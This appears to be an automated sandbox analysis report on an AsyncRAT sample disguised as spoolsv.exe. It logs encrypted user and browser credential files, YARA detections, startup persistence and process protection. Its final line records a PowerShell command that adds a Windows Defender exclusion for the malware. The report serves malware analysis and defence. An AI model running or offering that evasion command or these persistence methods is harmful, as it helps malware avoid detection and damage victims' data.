                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml.ENC entropy: 7.99722266838Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00001.jrs.ENC entropy: 7.99966803608Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00002.jrs.ENC entropy: 7.99966803608Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat.ENC entropy: 7.99998959622Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\23001069669.ttf.ENC entropy: 7.99921761431Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\wct7120.tmp.ENC entropy: 7.99759038953Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\28367963232.ttf.ENC entropy: 7.99929976892Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\wctB366.tmp.ENC entropy: 7.99720346596Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\29442803203.ttf.ENC entropy: 7.99915824977Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\wctDE6E.tmp.ENC entropy: 7.99999558044Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\30264859306.ttf.ENC entropy: 7.99914542768Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\24153076628.ttf.ENC entropy: 7.99919970329Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm.ENC entropy: 7.99013685157Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\30284701761.ttf.ENC entropy: 7.99930276621Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol.ENC entropy: 7.99996697399Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\31558910439.ttf.ENC entropy: 7.99917253095Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx.ENC entropy: 7.99994208546Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs.ENC entropy: 7.99994386816Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.ENC entropy: 7.99994386816Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\37262344671.ttf.ENC entropy: 7.99920103072Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_35.ttf.ENC entropy: 7.99976306881Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx.ENC entropy: 7.99994386816Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp.ENC entropy: 7.99985918122Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State.ENC entropy: 7.99744248276Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.ENC entropy: 7.99250562131Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64.ENC entropy: 7.99741676102Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\f92dd30f-d70e-4c79-98e6-b827a8bb342f.tmp.ENC entropy: 7.99921332942Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\prep_foundation_win32_bundle_V8_perf.cache.ENC entropy: 7.99972736707Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.cache.ENC entropy: 7.99910318787Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\GameDVR\KnownGameList.bin.ENC entropy: 7.99966655741Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.ENC entropy: 7.99036690379Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.ENC entropy: 7.99692970168Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log.ENC entropy: 7.99969445742Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-651E6B08-3C.pma.ENC entropy: 7.99995652368Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231005-0843.log.ENC entropy: 7.99558257245Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231005-0844.log.ENC entropy: 7.9978345448Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231005-0847.log.ENC entropy: 7.99959600782Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\JSAMSIProvider32.dll.ENC entropy: 7.99851018566Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll.ENC entropy: 7.99863475909Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt.ENC entropy: 7.99336855892Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.ENC entropy: 7.9965270661Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database.ENC entropy: 7.99595095431Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies.ENC entropy: 7.99043836772Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons.ENC entropy: 7.9913913068Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico.ENC entropy: 7.99915719156Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\InterestGroups.ENC entropy: 7.99752518799Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.ENC entropy: 7.99521204386Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation.ENC entropy: 7.9907404913Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts.ENC entropy: 7.99089764897Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites.ENC entropy: 7.99205955667Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links.ENC entropy: 7.99854962335Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.ENC entropy: 7.99853437199Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1.ENC entropy: 7.99923310463Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\index.ENC entropy: 7.99944994388Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1.ENC entropy: 7.99923310463Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index.ENC entropy: 7.99932041867Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies.ENC entropy: 7.99144596424Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens.ENC entropy: 7.99513264492Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_1.ENC entropy: 7.99923310463Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\index.ENC entropy: 7.99926404572Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_3244_529259725\9e51170b-7adf-40ab-83b6-5f97b13bedcb.ENC entropy: 7.99918309595Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_3244_492380506\2132f61f-f790-4ae6-a355-8cf9a1533800.ENC entropy: 7.99982802771Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_3244_308048737\12ed7c6f-b741-47d7-afa5-30f752dc978b.ENC entropy: 7.99790783839Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_3244_2117939348\c78f9967-7a8c-44b0-ad94-732b63c89638.ENC entropy: 7.99976943194Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1990501612\1187695d-8276-4e31-8de1-9e57768989bd.ENC entropy: 7.9966662879Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1974482915\01d00eb7-ae22-4601-b5b4-6bd76494c105.ENC entropy: 7.99996072246Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1414705840\e8d11bd0-b939-446e-b741-2c68ed471a53.ENC entropy: 7.9999312087Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1097730144\873489b1-33b2-480a-baa2-641b9e09edcd.ENC entropy: 7.99151352322Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\common\analytics.js.ENC entropy: 7.99284119269Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_3244_677372717\84fb0759-2f62-4b78-b3f8-d06ffbe5ed10.ENC entropy: 7.99656780697Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\edge_BITS_3244_669696935\c50698d5-282c-4c8d-9fa6-c155f2d8d379.ENC entropy: 7.99991393032Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\libs\jquery-3.1.1.min.js.ENC entropy: 7.99787474525Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\libs\jquery-3.1.1.js.ENC entropy: 7.99937088955Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml.ENC entropy: 7.99157710635Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml.ENC entropy: 7.99388415599Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL.ENC entropy: 7.99549409701Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\v1FieldTypes.json.ENC entropy: 7.99968051601Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1\crl-set.ENC entropy: 7.99270548623Jump to dropped file
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1.ENC entropy: 7.99923310463Jump to dropped file

                            Operating System Destruction

                            barindex
                            Protects its processes via BreakOnTermination flag
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess information set: 01 00 00 00 Jump to behavior

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: spoolsv.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.spoolsv.exe.11c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                            Source: 0.2.spoolsv.exe.11c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                            Source: 0.0.spoolsv.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000002.3715445075.00000000011C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess Stats: CPU usage > 49%
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB0815509C8_2_00007FFB0815509C
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB0815BCB88_2_00007FFB0815BCB8
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB081575A48_2_00007FFB081575A4
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB08154E208_2_00007FFB08154E20
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB0815DF208_2_00007FFB0815DF20
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB08154BA48_2_00007FFB08154BA4
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB0815E3F08_2_00007FFB0815E3F0
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB081613F48_2_00007FFB081613F4
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB081644288_2_00007FFB08164428
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC65329C14_2_00007FFAAC65329C
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 22_2_00007FFAAC59173922_2_00007FFAAC591739
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 22_2_00007FFAAC59216122_2_00007FFAAC592161
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 23_2_00007FFAAC59173923_2_00007FFAAC591739
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 23_2_00007FFAAC59216123_2_00007FFAAC592161
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 24_2_00007FFAAC58173924_2_00007FFAAC581739
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 24_2_00007FFAAC58216124_2_00007FFAAC582161
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 25_2_00007FFAAC5A173925_2_00007FFAAC5A1739
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 25_2_00007FFAAC5A0EAE25_2_00007FFAAC5A0EAE
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 25_2_00007FFAAC5A216125_2_00007FFAAC5A2161
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CFDF4E27_2_73CFDF4E
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF375E27_2_73CF375E
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF5F1727_2_73CF5F17
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF332927_2_73CF3329
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF2ADC27_2_73CF2ADC
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF2EF427_2_73CF2EF4
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CFDAA027_2_73CFDAA0
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF25E027_2_73CF25E0
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF614627_2_73CF6146
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73D0453127_2_73D04531
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CF5CE827_2_73CF5CE8
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_0160DC7427_2_0160DC74
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 28_2_00007FFAAC5B173928_2_00007FFAAC5B1739
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeCode function: 28_2_00007FFAAC5B216128_2_00007FFAAC5B2161
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: String function: 73CF22A0 appears 31 times
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs spoolsv.exe
                            Source: spoolsv.exe, 00000000.00000002.3715445075.00000000011C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOptions.dll0 vs spoolsv.exe
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs spoolsv.exe
                            Source: spoolsv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: spoolsv.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.spoolsv.exe.11c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                            Source: 0.2.spoolsv.exe.11c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                            Source: 0.0.spoolsv.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000002.3715445075.00000000011C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                            Source: spoolsv.exe, 4Pf5wyqH6D.csCryptographic APIs: 'TransformFinalBlock'
                            Source: spoolsv.exe, jnVW0Qv7jP.csCryptographic APIs: 'TransformFinalBlock'
                            Source: spoolsv.exe, jnVW0Qv7jP.csCryptographic APIs: 'TransformFinalBlock'
                            Source: spoolsv.exe, 81LLGXwgWmkFd3SGxubrUwK4NeGEoB7cqzKfxjQCxJgSIHtY81mPkYSAkM5hil0AWrrRUFcQXhTrHYuy09.csBase64 encoded string: 'WHZeWjwWSIO6b8uvjqc9Qc6nFfD6eFtBYDQ6vDAyXiq47YUeg+g+UrRQFEM6L529', 'oziPGEo1pHgceuu5G5MJRNiapjSdvQaE8vp9DDWkGyyzfPJJ1oQefg5KKeTTIfZpvU6AGBtmpgwvhdLs7ZISOdhmumD3'
                            Source: spoolsv.exe, ZAe6rYgAvSEYLloZ9pFiUYGqhM6V22RVAxeYAQ4RLU7gqconupONCSVxHobHtc6U4b5HJlmYsyZluRs1EF.csBase64 encoded string: 'JZkGBQnwfQnwhrdbAhatyKerrLTDN3Jc52eC45gktbB4SSgsKq8DsG9AH4rdOLa47lEaVJ57lbK6RRqYKOc8acOtO521', 'J5XWlJFPtGF69qudigIwyaGL6ddAFFmwYzDN9Ooxkx1kMtPiwYm1Wif3zmHOPEEeu628K98jvZBE3fTwoXFk5B2CmapV', 'tYb3xlu08nhKxfSHWgOMV8oOAc6NouzavkGhQFVaEir3htYm7J68HioZMqBuJEjPkVnijli3rOt1rWDsgcGKAD1lqAUT', 'YksDvWWcBViX5RnIEV65jzC4blwrtunVJhOfXjDoVnagMAsYJj7ewXm0HXLwsg1TcZqxxAjgrxPRqNHkTZWzKNCsUHH7', 'vPBBD2aCcmrTBWSrtijutJn3mG7UlnzpyPxQ5WpWrnt2aDkUpdh6rhwbRAhfipXJSF0CPRJr9HI2peHDYFyUXKBH4xak', 'j9aCb7B3fgxWqQGkGDqpaIiKGm6hXpKvtDPfDwgD6O5zpjHLakICIH8dFENutpeJev77sjTXvvE13zJbaC3VEpNfxlvQ', 'gTS9kAsWNuNJIqS0QuLDlbii9gANPJyuYalhMdtlWRl4R8iZnKJnDGMmUzeImVJLza1bdKaGiWpzdkwobeZKolueRGx6', 'PPVNeEV3Jcux5qzrPOMionUeof8r86qwBPDWuVfBO3CWzSBwKBPupegZINo1iRK38rLQe09wPc5zZ51YFcRFEjbupAOO', 'tEtGSdxYNMWBoydJEUFylWOVZYZ9piaPvK3wvPbQbSdTkrQbv81IT1DOuZzhX8a7wPjrqT3gqOyOmJioY3j8bCkLq6Op', 'YBf82ZxVR31HoDW79PdFMoU5LYaispt6SxWWvvha2olkcrKbSFRg6kyOxAhTbmimvofrHndxVlnAb5yAVHL5YYLbamW3', 'vXQgDqaO05ETYxVwS07RWZU0pBDytuqnjxWyCNEQoz3B1e18ggEqWR8qLSO434556V55NeGg7cr8eNrg47YrjiajnUrq', 'HsvktiMEq224Y6DRukWGs3Kin5cEZTOqo7Jsh9NthnsyNBrKvkCXfoEA7rUiI3m7QtRnVAPViMOhA9VDgyK4MwND9OZA'
                            Source: 0.2.spoolsv.exe.11c0000.0.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.spoolsv.exe.11c0000.0.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 0.2.spoolsv.exe.11c0000.0.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.spoolsv.exe.11c0000.0.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: spoolsv.exe, ZwLUmu9cqratZu915eMghXRoDHu6UN6Q0gIYIPFL4YLRlVj3zMc4vlXwL9W6iahSFW85bEm8g6KqE5znj3.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: spoolsv.exe, ZwLUmu9cqratZu915eMghXRoDHu6UN6Q0gIYIPFL4YLRlVj3zMc4vlXwL9W6iahSFW85bEm8g6KqE5znj3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@24/1044@3/3
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spoolsv.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeMutant created: NULL
                            Source: C:\Users\user\Desktop\spoolsv.exeMutant created: \Sessions\1\BaseNamedObjects\tKuqTPRmZfsnSMa4
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
                            Source: C:\Users\user\Desktop\spoolsv.exeFile created: C:\Users\user\AppData\Local\Temp\spoolsv.exeJump to behavior
                            Source: spoolsv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: spoolsv.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                            Source: C:\Users\user\Desktop\spoolsv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: spoolsv.exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\Desktop\spoolsv.exeFile read: C:\Users\user\Desktop\spoolsv.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\spoolsv.exe "C:\Users\user\Desktop\spoolsv.exe"
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe'
